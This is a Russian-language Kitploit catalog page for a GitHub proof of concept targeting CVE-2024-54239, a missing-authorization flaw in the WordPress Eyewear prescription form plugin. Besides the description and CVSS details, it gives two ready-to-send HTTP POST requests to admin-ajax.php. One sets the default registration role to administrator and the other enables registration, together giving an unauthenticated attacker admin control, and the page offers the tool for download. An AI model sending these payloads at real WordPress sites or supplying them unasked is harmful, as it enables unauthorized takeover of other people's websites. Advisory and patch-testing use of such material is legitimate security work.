Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-54239 — Форма рецепта на очки <= 4.0.18 - Отсутствие авторизации, приводящее к неаутентифицированному произвольному обновлению параметров | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-54239
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьНеправильная Конфигурация
GitHubrandomrobbiebf/cve-2024-54239

CVE-2024-54239

Форма рецепта на очки <= 4.0.18 - Отсутствие авторизации, приводящее к неаутентифицированному произвольному обновлению параметров

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-54239

Форма рецептов на очки <= 4.0.18 — отсутствие авторизации приводит к неаутентифицированному произвольному обновлению опций

Описание

Плагин Eyewear prescription form для WordPress уязвим к несанкционированному изменению данных, что может привести к повышению привилегий из-за отсутствия проверки прав доступа в функции adminSetting() во всех версиях до 4.0.18 включительно. Это позволяет неаутентифицированным злоумышленникам обновлять произвольные опции на сайте WordPress. Данную уязвимость можно использовать для изменения роли по умолчанию при регистрации на администратора и включения регистрации пользователей, что позволит злоумышленникам получить административный доступ к уязвимому сайту.

Детали

  • Тип: плагин
  • Slug: eyewear-prescription-form
  • Затрагиваемая версия: 4.0.18
  • Оценка CVSS: 9.8
  • Рейтинг CVSS: Критический
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-54239
  • Статус: Активен

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1
Скачать инструмент